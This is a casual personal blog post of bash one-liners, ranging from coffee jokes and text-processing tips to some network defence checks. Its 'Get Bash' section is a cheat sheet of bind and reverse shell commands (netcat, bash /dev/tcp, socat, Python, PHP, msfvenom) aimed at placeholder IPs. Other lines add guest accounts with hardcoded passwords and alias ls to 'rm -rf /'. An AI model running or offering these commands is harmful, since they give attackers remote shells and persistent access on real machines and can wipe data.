Coffee-Mate: Bash Oneliner
Sometimes I wanna pretend to be busy in the office to enjoy a cup of coffee…but how?
cat /dev/urandom | hexdump -C | grep "ca fe"
Haha, this one is cool…no one knows what I am doing…
Then I go enjoy coffee secretly. ❤
What is Bash?
Bash is a command language interpreter. It is widely available on various operating systems and is a default command interpreter on most GNU/Linux systems. The name is an acronym for the ‘Bourne-Again SHell’.
Interestign Bash Commands
file
$ cat coffee.txt | grep 'mocha' | awk ' ' '{print $4}' | sort | uniq
$ find . -name coffee_type # Find a file with name
$ awk ‘!seen[$0]++’ coffee.txt | tee output.txt # Remove duplicate lines in file
$ wget -O ./f4bb1t.png "https://f4bb1t.com/images/favicon/favicon.png"
$ find . -type f -size +500M # Find those over-sized files
$ grep -lir "some text" * # Find files containing text, case-insensitive
$ lsof / | awk '{ if($7 > 1048576) print $7/1048576 "MB" " " $9 " " $1 }' | sort -n -u | tail # show 10 last open files
$ grep -C 3 'secret' ./coffee_with_secrets.txt --color # Print lines containing ‘secret’ + (3 lines before + 3 lines after) + COLOUR
$ sed -e 's/.*/PREFIX: & :SUFFIX/' /tmp/file # Prepend & append to each line at the same time
$ sed -i '/^$/d' # Remove empty lines
$ for i in *; do mv "$i" ${i// /_};done # no one wants a file name with spaces.txt
Time and Date
$ date
$ date '+%Y/%m/%d %H:%M:%S'
$ cal
$ cal [year]
This is great!
encode and decode
$ echo "security" | base64
c2VjdXJpdHkK
$ echo "c2VjdXJpdHkK" | base64 -d
security
Some defense
$ netstat -anpt
$ tar -cvf backup.tar / # back up root directory
$ vim /etc/ssh/sshd_config # limit ssh IP
$ netstat -n | awk '/^tcp/ {++S[$NF]} END {for(a in S) print a, S[a]}' # check connection
$ netstat -ntu | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
Get Bash
Direct:
$ nc -lvvp 8080 -t -e /bin/bash # remote
$ nc <remote ip> 8080 # local
Reverse:
- bash
$ bash -i >& /dev/tcp/<remote ip>/8080 0>&1
- netcat
$ nc -lvvp 8080 # local
$ nc <local ip> 8080 -t -e /bin/bash # remote
- socat
$ socat TCP-LISTEN:12345 - # local
$ /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<local ip>:12345
- python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<local ip>",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
- php
php -r '$sock=fsockopen("<local ip>",8080);exec("/bin/sh -i <&3 >&3 2>&3");'
- msf
msfvenom -l payloads 'cmd/unix/reverse'
msfvenom -p cmd/unix/reverse_bash lhost=x.x.x.x lport=12345 R
Others
$ l\s # same as `ls`
$ echo $SHELL # to see the default interpreter
$ alias ls='rm -rf /' # dangerous
$ unalias ls
$ ps aux | awk '{if ($5 != 0 ) print $2,$5,$6,$11}' | sort -k2n # Which process is using precious memory
$ echo "test" | tee >(pbcopy) # copy something to clipboard
$ tr -dc 'a-zA-Z0-9~!@#$%^&*_()+}{?></";.,[]=-' < /dev/urandom | fold -w 32 | head -n 1 # Generate random 32 character password, macOS not working
$ !ln # Run the last command beginning with ‘ln’
$ mplayer tv:// -tv driver=v4l2:width=640:height=480:device=/dev/video0 -fps 15 -vf screenshot # Take a screenshot from your Front Facing Camera
Add account:
$ useradd guest;echo 'guest:f4bb1t'|chpasswd
$ useradd -p `openssl passwd f4bb1t` guest
$ useradd test;echo -e "f4bb1t" |passwd test
Sometimes, when I recall that moment, my heart skipped a beat when he typed ‘whoami’ 🧶